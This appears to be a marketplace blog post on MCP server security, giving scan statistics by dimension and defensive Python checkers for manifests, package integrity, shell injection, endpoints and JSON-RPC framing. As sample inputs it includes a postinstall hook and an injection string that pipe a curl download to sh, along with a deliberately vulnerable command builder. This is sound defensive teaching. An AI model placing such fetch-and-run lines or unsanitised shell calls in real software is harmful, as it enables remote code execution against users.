Updated June 24, 2026

What Makes an MCP Server Secure (and the 5 Ways They Go Wrong)

A secure MCP server gets five things right. We scanned 10,000+ to find where they actually fail. Supply chain is the big one; the server's own code almost never is.

Key takeaways

  • A secure MCP server gets five things right, but the data says only one of them, the supply chain, is where servers seriously fail.
  • The server's own code is almost never the risk (1.6% serious). Reading the repo, the thing most people do, is the weakest of the five checks.
  • Skip the manual work: a security score rolls all five dimensions into one number you can see before you install.

A secure MCP server gets five things right: a trustworthy supply chain, a package that matches its source, clean code, a verifiable remote endpoint, and spec-compliant transport. MCP servers are the plug-in tools that extend AI assistants like Claude and ChatGPT. When we security-scanned more than 10,000 of them, those five dimensions were exactly where a server passed or failed. The useful surprise in the data is how lopsided the failures are. Supply chain produces more serious findings than the other four dimensions combined (31.8% of servers, against 8.3% for the other four together). The server's own code, the thing most people actually read before installing, is almost never where the risk lives.

Here is what each dimension means, how often servers get it wrong, and what a secure server looks like.

Chart: where MCP servers actually fail, by share of scanned servers with a high or critical finding. Supply chain 31.8%, package verification 4.0%, transport/protocol 2.7%, code vulnerabilities 1.6%, remote endpoint trust 0%.

A "serious finding" means high or critical severity. The "any finding" column includes minor and informational flags that usually do not affect safety, so a high any-finding rate is not the same as high risk.

Dimension               Serious finding (high or critical)   Any finding
Supply chain                                         31.8%         37.0%
Package verification                                  4.0%         46.9%
Code vulnerabilities                                  1.6%          5.2%
Remote endpoint trust                                   0%         22.7%
Transport / protocol                                  2.7%         31.2%

1. Supply chain: the one that actually bites

This is where MCP servers go wrong, and it is not close. Nearly 1 in 3 servers we scanned (31.8%) has a high or critical supply-chain finding, more than every other dimension combined.

Supply-chain risk means the danger comes from what a server pulls in and runs, not from the server itself. When you install one, it often fetches other packages and dependencies from outside sources. If any of those are untrusted, unverifiable, or different from what the author published, that code runs with the same access the server has. Crucially, none of it lives in the repository you read before installing, so a clean-looking codebase tells you nothing about it.

What a secure server looks like: pinned, verifiable dependencies from trusted sources, no install step that quietly fetches and runs remote code, and a clear, auditable path from the source you can read to the package you actually install.
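One concrete shape of that check, as an added example that is not the marketplace scanner's code: a Python function that takes a parsed npm package.json and flags the three things the paragraphs above describe. Install-time hooks (preinstall, install, postinstall) that fetch and run remote code, dependencies resolved from git or tarball URLs instead of the registry, and floating version ranges with no lockfile to pin them. The two manifests, the hook and pattern lists, and the severity labels are constructed for the demo; the domain example.invalid is reserved and never resolves.

```python
"""Supply-chain checks on an npm package manifest (added example, constructed input)."""
import json
import re

# Lifecycle hooks npm runs automatically when the package is installed as a dependency.
INSTALL_HOOKS = ("preinstall", "install", "postinstall")

# Shell fragments that mean an install hook pulls code from the network at install time.
REMOTE_FETCH = re.compile(r"\b(?:curl|wget)\b|https?://|\bnpx\b")

# An exact pin: "1.2.3" or "=1.2.3", optionally with a pre-release or build suffix.
EXACT_VERSION = re.compile(r"^=?\d+\.\d+\.\d+(?:[-+][0-9A-Za-z.\-]+)?$")

# Specs that bypass the registry entirely: git repos, tarball URLs, local paths.
NON_REGISTRY_PREFIXES = ("git+", "git://", "github:", "http://", "https://", "file:")

SEVERITY_RANK = {"high": 0, "medium": 1}


def _finding(severity, where, why):
    return {"severity": severity, "where": where, "why": why}


def check_manifest(manifest: dict, lockfile_present: bool) -> list:
    """Return supply-chain findings for one parsed package.json, highest severity first."""
    findings = []

    scripts = manifest.get("scripts", {})
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        if REMOTE_FETCH.search(cmd):
            findings.append(_finding("high", f"scripts.{hook}",
                                     "install hook downloads and runs code from the network"))
        else:
            findings.append(_finding("medium", f"scripts.{hook}",
                                     "install hook runs arbitrary commands at install time"))

    for section in ("dependencies", "optionalDependencies"):
        for name, spec in manifest.get(section, {}).items():
            where = f"{section}.{name}"
            if spec.startswith(NON_REGISTRY_PREFIXES) or "://" in spec:
                findings.append(_finding("high", where,
                                         "dependency resolved from a URL or path, not the registry"))
            elif spec in ("", "*", "latest", "x"):
                findings.append(_finding("high", where, "dependency accepts any version"))
            elif not EXACT_VERSION.match(spec) and not lockfile_present:
                findings.append(_finding("medium", where,
                                         "floating version range with no lockfile to pin it"))

    return sorted(findings, key=lambda f: SEVERITY_RANK[f["severity"]])


def worst_severity(findings: list):
    """'high', 'medium', or None when the manifest is clean."""
    return findings[0]["severity"] if findings else None


# Constructed manifests for the demo. The dependency names are placeholders.
RISKY_MANIFEST = json.loads("""{
  "name": "demo-mcp-server", "version": "0.3.1",
  "scripts": {
    "postinstall": "curl -fsSL https://example.invalid/setup.sh | sh",
    "build": "tsc"
  },
  "dependencies": {
    "some-sdk": "^1.0.0",
    "some-util": "github:someone/some-util",
    "some-yaml": "*",
    "some-schema": "3.23.8"
  }
}""")

CLEAN_MANIFEST = json.loads("""{
  "name": "demo-mcp-server", "version": "0.3.1",
  "scripts": {"build": "tsc"},
  "dependencies": {"some-sdk": "1.4.2", "some-schema": "3.23.8"}
}""")

if __name__ == "__main__":
    for f in check_manifest(RISKY_MANIFEST, lockfile_present=False):
        print(f"{f['severity']:6} {f['where']}: {f['why']}")
```

Note what the lockfile does and does not buy you: with a lockfile present the caret range stops being a finding, because the installed version is pinned, but the postinstall hook and the github: dependency stay high either way, since neither is something the lockfile can make reproducible.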

2. Package verification: common, usually minor

Almost half of servers (46.9%) have some package-verification finding, but only 4.0% rise to high or critical. So this is the most frequently flagged dimension and one of the least dangerous.

Package verification asks a simple question: does the published package cleanly match its stated source? A mismatch is often innocent, a stale build or a missing tag. Occasionally it is the early signal of something worse, which is why it gets flagged even when minor.

What a secure server looks like: the published artifact matches its source repository, versions are tagged, and there is no gap between the code you can inspect and the code that ships.
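The "does the artifact match its source" question, carried out in code as an added example (not the marketplace's verifier): build an npm-style tarball in memory, hash every file in it, and classify the differences against the source tree at the tagged commit. Files that exist only in the artifact and files whose bytes differ are the red flags; files only in the repository (tests, docs) are normally expected. The source tree and both tarballs are constructed for the demo and stand in for `npm pack` output and a `git checkout` of the tag.

```python
"""Compare a published tarball to its source tree (added example, constructed input)."""
import hashlib
import io
import tarfile


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def build_tarball(files: dict, prefix: str = "package/") -> bytes:
    """Build an npm-style gzipped tarball in memory (stands in for `npm pack` output)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for path, data in files.items():
            info = tarfile.TarInfo(prefix + path)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def tarball_digests(tarball: bytes, prefix: str = "package/") -> dict:
    """Map every regular file in the tarball to its sha256, with npm's 'package/' prefix stripped."""
    out = {}
    with tarfile.open(fileobj=io.BytesIO(tarball), mode="r:*") as tar:
        for member in tar.getmembers():
            if not member.isfile():
                continue
            name = member.name[len(prefix):] if member.name.startswith(prefix) else member.name
            out[name] = sha256(tar.extractfile(member).read())
    return out


def compare_to_source(package_digests: dict, source_files: dict) -> dict:
    """Classify the differences between what shipped and what the repository contains."""
    source_digests = {path: sha256(data) for path, data in source_files.items()}
    return {
        # Files in the artifact that exist nowhere in the repo: the classic injection point.
        "only_in_package": sorted(set(package_digests) - set(source_digests)),
        # Files in the repo that were not shipped (tests, docs): usually expected.
        "only_in_source": sorted(set(source_digests) - set(package_digests)),
        # Same path, different bytes: the artifact does not match the tag it claims.
        "modified": sorted(p for p in package_digests
                           if p in source_digests and package_digests[p] != source_digests[p]),
    }


def matches_source(report: dict) -> bool:
    """Only additions to the artifact and altered files break the match."""
    return not report["only_in_package"] and not report["modified"]


# Constructed source tree at the tagged commit.
SOURCE_TREE = {
    "package.json": b'{"name":"demo-mcp-server","version":"1.0.0"}\n',
    "index.js": b"console.log('hello from demo-mcp-server');\n",
    "test/index.test.js": b"// tests are not shipped\n",
}

# Constructed "published" artifact: one file altered, one file added, tests omitted.
PUBLISHED_FILES = {
    "package.json": SOURCE_TREE["package.json"],
    "index.js": b"console.log('hello from demo-mcp-server');\nrequire('./extra');\n",
    "extra.js": b"// code that never appeared in the repository\n",
}
PUBLISHED_TARBALL = build_tarball(PUBLISHED_FILES)

# An honest build of the same tag: the repo contents minus the test directory.
HONEST_TARBALL = build_tarball({k: v for k, v in SOURCE_TREE.items() if not k.startswith("test/")})

if __name__ == "__main__":
    report = compare_to_source(tarball_digests(PUBLISHED_TARBALL), SOURCE_TREE)
    print(report, "match:", matches_source(report))
```

A real build step (TypeScript to JavaScript, bundling) means the comparison has to run against the build output of the tagged source rather than the raw checkout; the classification logic stays the same.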

3. Code vulnerabilities: rarely the problem

Here is the counterintuitive one. Only 5.2% of servers have any code-vulnerability finding at all, and just 1.6% have a serious one. The server's own code, the part you would skim on GitHub before installing, is almost never where the risk is.

That matters because it is exactly backwards from how most people vet a server. A clean-looking repo feels safe, but a clean repo tells you almost nothing about the supply-chain risk in dimension 1.

What a secure server looks like: input is validated, scope is limited to what the server actually needs, and user input never flows straight into a shell command. Good code hygiene helps, but it is table stakes, not the differentiator.
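The shell-command rule in the last sentence above, as an added example that is not code from any scanned server: a "ping this host" tool handler written the careless way and the hardened way. The vulnerable version pastes whatever the model supplied into a shell line; the hardened version validates the input as a plain hostname, builds an argv list so no shell ever parses it, and bounds the runtime. The hostname pattern, the tool shape and the sample inputs are assumptions for the demo.

```python
"""Shell injection in an MCP tool handler, vulnerable and hardened (added example)."""
import re
import subprocess

# A plain hostname or dotted IP: labels of letters, digits and hyphens joined by dots,
# no label starting or ending with a hyphen, 253 characters at most. Nothing else.
HOSTNAME = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(?:\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)

# Characters a POSIX shell acts on; anything here in tool input means the command changed.
SHELL_META = re.compile(r"[;&|`$<>(){}\n]")


def vulnerable_ping_command(host: str) -> str:
    """The careless handler: model-supplied text is spliced into a line run with shell=True."""
    return f"ping -c 1 {host}"   # "a.example.com; curl ... | sh" becomes two commands


def shell_metacharacters(host: str) -> set:
    """Which shell-significant characters the vulnerable handler would hand to the shell."""
    return set(SHELL_META.findall(host))


def hardened_ping_argv(host: str) -> list:
    """Validate first, then build an argv list; the shell never sees the input."""
    if not HOSTNAME.match(host):
        raise ValueError(f"refusing to ping {host!r}: not a plain hostname")
    return ["ping", "-c", "1", host]


def accepts(host: str) -> bool:
    """True when the hardened handler would run the tool for this input."""
    try:
        hardened_ping_argv(host)
        return True
    except ValueError:
        return False


def run_tool(host: str, timeout: float = 5.0) -> str:
    """Execute the hardened command: argv list, no shell, bounded runtime, captured output."""
    argv = hardened_ping_argv(host)
    done = subprocess.run(argv, capture_output=True, text=True, timeout=timeout, check=False)
    return done.stdout


# Constructed inputs: what a model, or whoever controls the prompt, might hand the tool.
BENIGN = "example.com"
INJECTION = "example.com; curl https://example.invalid/x.sh | sh"

if __name__ == "__main__":
    print("vulnerable would run :", vulnerable_ping_command(INJECTION))
    print("shell would act on   :", sorted(shell_metacharacters(INJECTION)))
    print("hardened accepts     :", accepts(BENIGN), accepts(INJECTION))
```

The scope point from the paragraph is in the same code: the tool accepts one hostname and nothing else, so there is no flag, path or option for the model to reach, and a leading hyphen (an attempt to smuggle options) fails the pattern before anything runs.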

4. Remote endpoint trust: a yellow flag, not a red one

About 22.7% of servers carry a remote-trust flag, but on its own it never rises to high or critical, which is why it shows as zero in the serious column. Treat it as a caution signal, not an alarm.

Remote trust applies to hosted servers whose endpoint or operator is hard to verify. You are sending data to a server someone else runs, so who runs it and whether you can confirm that is worth knowing. It rarely makes a server dangerous by itself, but it compounds a supply-chain or package problem, which is why it still counts toward a server's profile.

What a secure server looks like: a clearly identified operator, a verifiable endpoint, and transparency about where your data goes once it leaves your machine.
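What "a verifiable endpoint" reduces to before a client sends its first byte, as an added example in Python that is not the marketplace's scanner: a policy check on the advertised URL against the domains the stated operator actually controls. It rejects plain http, credentials embedded in the URL, raw IP literals (no certificate identity to tie to an operator), and hosts outside the operator's domains, including the lookalike "mcp.example.com.evil.test" that a naive suffix match would let through. The operator allowlist and the sample URLs are constructed; certificate validation itself is left to the HTTPS client library at connect time.

```python
"""Endpoint trust policy for a hosted MCP server (added example, constructed input)."""
import ipaddress
from urllib.parse import urlsplit

# Domains the stated operator controls (constructed allowlist for the demo).
OPERATOR_DOMAINS = ("mcp.example.com", "example.com")


def _under_domain(host: str, domain: str) -> bool:
    """Label-boundary suffix match: 'api.example.com' yes, 'notexample.com' no."""
    return host == domain or host.endswith("." + domain)


def check_endpoint(url: str, operator_domains=OPERATOR_DOMAINS) -> tuple:
    """Return (ok, reason). Each failing rule is a reason to stop before any data leaves."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    if parts.scheme != "https":
        return False, "not https: traffic and tokens are readable in transit"
    if parts.username or parts.password:
        return False, "credentials embedded in the URL"
    if not host:
        return False, "no host"
    try:
        ipaddress.ip_address(host)
        return False, "raw IP address: no certificate identity to tie to an operator"
    except ValueError:
        pass  # not an IP literal, carry on
    if not any(_under_domain(host, d) for d in operator_domains):
        return False, f"host {host!r} is outside the operator's domains"
    return True, "ok"


def screen(urls) -> dict:
    """Map each candidate URL to the reason it was accepted or refused."""
    return {u: check_endpoint(u)[1] for u in urls}


# Constructed candidates, including the lookalike and the credential-in-URL mistakes.
CANDIDATES = [
    "https://mcp.example.com/v1/mcp",
    "https://api.example.com/mcp",
    "http://mcp.example.com/v1/mcp",
    "https://mcp.example.com.evil.test/v1/mcp",
    "https://notexample.com/mcp",
    "https://user:tok@mcp.example.com/v1/mcp",
    "https://203.0.113.7/mcp",
]

if __name__ == "__main__":
    for url, reason in screen(CANDIDATES).items():
        print(f"{reason:60} {url}")
```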

5. Transport and protocol: spec compliance

Around 31.2% of servers have a transport or protocol finding, and 2.7% are serious. These are servers whose transport or protocol handling does not follow the MCP spec.

Most of these are correctness and reliability issues rather than direct attacks. But protocol handling that ignores the spec is also where edge-case bugs and unexpected behavior hide, which is why it counts toward a server's security profile.

What a secure server looks like: standards-compliant transport, correct protocol handling, and no improvised deviations from the spec.
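MCP messages are JSON-RPC 2.0, and on the stdio transport each message is one line of JSON with no embedded newlines. The added example below (not the marketplace's scanner) is a validator for exactly those rules: every message is an object with "jsonrpc":"2.0"; a request has a string method and an id that is a string or integer, never null; a response carries exactly one of result or error; and a frame that spans lines fails to parse at all. The stream of frames is constructed and includes a pretty-printed message to show how an indent-enabled encoder breaks framing.

```python
"""Validate MCP stdio frames as JSON-RPC 2.0 (added example, constructed input)."""
import json


def _valid_id(value) -> bool:
    # bool is a subclass of int in Python; exclude it explicitly.
    return isinstance(value, str) or (isinstance(value, int) and not isinstance(value, bool))


def validate_message(msg) -> list:
    """Return the spec violations in one decoded message (an empty list means compliant)."""
    if not isinstance(msg, dict):
        return ["message is not a JSON object"]
    problems = []
    if msg.get("jsonrpc") != "2.0":
        problems.append('missing or wrong "jsonrpc" (must be "2.0")')

    if "method" in msg:                       # request (has id) or notification (no id)
        if not isinstance(msg["method"], str):
            problems.append('"method" must be a string')
        if "params" in msg and not isinstance(msg["params"], (dict, list)):
            problems.append('"params" must be an object or array')
        if "id" in msg and not _valid_id(msg["id"]):
            problems.append('request "id" must be a string or integer, never null')
    else:                                     # response
        if "id" not in msg:
            problems.append('response has no "id"')
        has_result, has_error = "result" in msg, "error" in msg
        if has_result == has_error:
            problems.append('response must carry exactly one of "result" or "error"')
        if has_error:
            err = msg["error"]
            if not (isinstance(err, dict) and isinstance(err.get("code"), int)
                    and isinstance(err.get("message"), str)):
                problems.append('"error" needs an integer "code" and a string "message"')
    return problems


def validate_stream(data: bytes) -> list:
    """Split a raw stdio stream on newlines and validate each frame: [(line_no, problems)]."""
    report = []
    for n, raw in enumerate(data.split(b"\n"), start=1):
        line = raw.strip()
        if not line:
            continue
        try:
            msg = json.loads(line.decode("utf-8"))
        except (UnicodeDecodeError, json.JSONDecodeError):
            report.append((n, ["frame is not one complete JSON document (embedded newline?)"]))
            continue
        report.append((n, validate_message(msg)))
    return report


def compliant_lines(report: list) -> list:
    """Line numbers whose frame passed every check."""
    return [n for n, problems in report if not problems]


# Constructed stream: three good frames, two bad ones, then one message pretty-printed
# across five lines, which the newline-delimited transport sees as five broken frames.
SAMPLE_STREAM = b"\n".join([
    b'{"jsonrpc":"2.0","id":1,"method":"initialize","params":{"clientInfo":{"name":"demo-client"}}}',
    b'{"jsonrpc":"2.0","id":1,"result":{"serverInfo":{"name":"demo-mcp-server"}}}',
    b'{"jsonrpc":"2.0","method":"notifications/initialized"}',
    b'{"jsonrpc":"2.0","id":null,"method":"tools/list"}',
    b'{"id":2,"result":{},"error":{"code":-32600,"message":"Invalid Request"}}',
    b'{\n  "jsonrpc": "2.0",\n  "id": 3,\n  "method": "ping"\n}',
]) + b"\n"

if __name__ == "__main__":
    for n, problems in validate_stream(SAMPLE_STREAM):
        print(n, "ok" if not problems else "; ".join(problems))
```

The last case is the everyday version of a spec deviation: nothing malicious, just `json.dumps(msg, indent=2)` somewhere in the server, and every client that frames on newlines now sees garbage. Encode frames compactly (`separators=(",", ":")`) and the problem cannot arise.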

So what makes a server secure?

A secure MCP server is clean across all five dimensions, but the data says the one to actually worry about is the supply chain. The good news is that you do not have to evaluate five dimensions by hand on every server. That is what a security score is for: it rolls all five into one number you can see before you install.

The reflex most people have, reading the repo, is the weakest check of the five. The repo shows you dimension 3, the one that almost never fails. It tells you nothing about the supply chain, the one that does.

Browse security-scanned MCP servers, sorted by security score

For the full distribution of how risky the MCP ecosystem actually is, see our data study on how safe MCP servers are. For a plain-language primer on the risks, see whether MCP servers are safe.


Methodology: figures reflect automated security scans of the live MCP Marketplace catalog as of June 2026, covering more than 10,000 listed servers (those in approved or publicly flagged status). Findings are grouped into the five categories above and rated by severity by our automated scanner. We report aggregate results only, and percentages are rounded.
